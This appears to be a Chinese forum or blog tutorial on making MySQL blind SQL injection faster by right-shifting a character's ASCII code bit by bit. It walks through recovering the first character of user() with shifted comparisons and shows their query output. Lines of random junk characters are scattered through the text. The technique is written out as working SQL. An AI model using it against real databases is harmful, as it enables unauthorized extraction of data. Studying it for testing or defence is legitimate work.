关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位
* I; o  R4 j! W; t2 `9 Y


下面将以查询mysql数据库当中user()的第一位为例:

( {! o5 {1 X9 _& B) g' c- I
! |! D6 ], Z8 E) r) i4 T
; {* \" l/ I+ m% Z3 [ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)

2 p3 {- S8 F% m! c
" ]' E) `& N* [" G
$ \2 V" H# }2 ~" K# W4 t4 Q1 r# [首先执行如下sql语句:


& ^9 C, V8 x% f* a# x4 E) o
mysql> select (ascii((substr(user(),1,1))) >> 7)=0;


) k* S) S9 H; V3 z4 J+ ~6 B
我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的



4 u# a" p: f/ [/ B第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
& ?7 l$ j+ K8 L/ ~8 O  N8 f3 X


8 G; i& {4 ?% Z' w7 ^+ k( m& t如果运算结果为1,说明第一位为0,不为1
& V' v. y1 b% e* k, o, b

7 D/ A4 c5 {+ R( F6 s
0 @2 h: \, B) u, I# q: y- U1 ~+————————————–+

$ [) R7 z2 c+ F  p| (ascii((substr(user(),1,1))) >> 7)=0 |
# A) t2 Q& e* F/ e: n0 d
+————————————–+

| 1 |
( Z. s: q" K: l+ M( H) _
3 G6 t! `5 T7 U- j+————————————–+

1 row in set (0.00 sec)

  p! x/ F# _5 Z; e0 c这样我们就确定这个8bit的ascii的第一位为0



第二次我们来做6次右偏移来确定前两位



9 h$ \* Q! z( [前两位可能是01或00,即依然可以与0做比较,

$ o6 d4 F& c- e: j" M. kmysql> select (ascii((substr(user(),1,1))) >> 6)=0;

2 M. M' e0 Z% Q7 U+————————————–+
9 ]. o5 i) G. x* l
| (ascii((substr(user(),1,1))) >> 6)=0 |

0 v% a1 W9 R# y! m& z& Y, |. [+————————————–+
+ O' E3 P3 @- p) L6 C- b
, N5 P1 b6 U8 R* t' \) n+ V| 0 |
9 t6 U3 q( u* a, @( X
+————————————–+
9 V, }& m1 g  j2 I# g
1 row in set (0.00 sec)
: L5 G. x8 L4 A; i
4 G' t5 a; x7 c8 ]
1 D$ K6 x+ E- C2 I
结果为0,即第二位为1


# f  X5 m& c: ?
开始猜测前三位为010或011



让我们看看010和011的ascii码是多少
9 a8 a: m8 T4 T( `+ H$ ^5 n

9 l& Y0 e9 q6 P9 ~9 P& H
. T( C1 L- C: C; {! I分别查询select b’011′ select b’010′
) t3 k' a7 P( A5 v( L8 a, r

2 R) W6 j5 g5 L+ F# U
6 P2 Z' O- t* r获得结果 010 = 2 011 = 3
0 F& T, ^* q$ O
& c. J6 t" D9 Q1 B" i

& ^% w4 t; ^, o4 p( ?执行如下sql:



* V" c' I' Q7 `( r6 Qmysql> select (ascii((substr(user(),1,1))) >> 5)=2;
% ~9 z# |2 Z- a
+————————————–+
1 ~% l/ ]9 B' v- o
| (ascii((substr(user(),1,1))) >> 5)=2 |

+————————————–+
0 M2 I( d6 q$ k  O* _% Y$ n. H: P
| 0 |
- E2 N% A1 ?% V: O0 o
+————————————–+
0 F" O. j! p2 E7 K9 I* j* g
: Z5 w0 L) l+ O( ^6 }即前三位不为010,而是011
4 H: g1 R+ Q& _3 w/ w

+ o( h7 c: W8 D+ G  V/ C
直到获得最后一位
* f7 U! s5 M+ c) E0 d" h. V( V* J8 l! o


, o, M  m/ r9 e7 O最终结果为:01110010
# q. ?& j9 Z# o


转换一下:

  I( n5 h6 c* r
/ W% R- G' c% B: w- I( s
6 m$ z. M# H$ H4 c+ ]% q! _select b’01110010′

1 a) D& s' F8 ?& y7 ?$ r4 k( X

6 S; I# ^# p9 Q" W查询结果


% @' [$ x& ~0 K& E6 k! U6 ?; u$ c
; @1 M' \8 G; x( R/ \+————-+

+ v: W( {1 R# T7 e. k0 O* _9 |  V5 i5 m: e| b’01110010′ |
5 U$ r- V* A& E6 A: i- v9 D
% h2 }1 ]6 U1 F1 `5 F; `7 D! O1 ~/ P+————-+
! ]1 f. o! K& A/ q" {2 c/ i! [$ A
| r |
+ y/ Y0 _" f/ U* J# w
; L+ @* u! K. I! z8 c( ]4 l0 j; w+————-+
% A9 M& Y5 _7 W+ h0 B
8 p  F+ P3 Q0 y! o" R: ~1 row in set (0.00 sec)

+ o1 p) }/ `0 H4 i4 j

7 O' j7 d6 d% D$ K这样我们就获得了user()的第一位.其它位依此类推

6 g# t: m$ Z. O) Z( c